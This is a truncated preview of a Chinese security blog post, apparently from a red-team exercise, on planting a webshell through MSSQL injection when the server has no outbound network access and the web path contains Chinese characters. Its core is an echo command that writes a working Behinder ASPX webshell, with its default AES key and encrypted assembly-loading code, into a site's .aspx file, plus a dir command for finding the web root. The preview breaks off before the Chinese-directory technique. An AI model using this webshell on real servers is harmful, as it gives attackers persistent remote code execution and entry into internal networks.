记一次攻防Mssql注入中文目录写shell方式

F12sec · 公众号 · · 2024-05-31 08:48

文章预览

免责说明本文章仅供学习交流和安全研究使用，请勿用于违法行为，否则后果自负！在某次攻防中遇到mssql注入，服务器不出网，无法直接上线cs，只能写入webshell进入内网。正常方式: 利用dir命令查找网站所在目录(这里直接查找网站前端文件) dir /s /b D:pcxxxv5.jpg 再利用echo命令写入webshell(冰蝎) ECHO ^"C#" %^>^@Import Namespace= "System.Reflection" %^>^"k", "e45e329feb5d925b" ); /*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/ byte [] k = Encoding.Default.GetBytes(Session[ 0 ] + "" ),c = Request.BinaryRead(Request.ContentLength);Assembly.Load( new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0 , c.Length)).CreateInstance( "U" ).Equals( this );%^> > D:\xxx\Coxxxxent\js\test.aspx 一般这样就写入成功了，但是在某次攻防中遇到中文目录死活写不进去，后面研究了一下中文目 ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博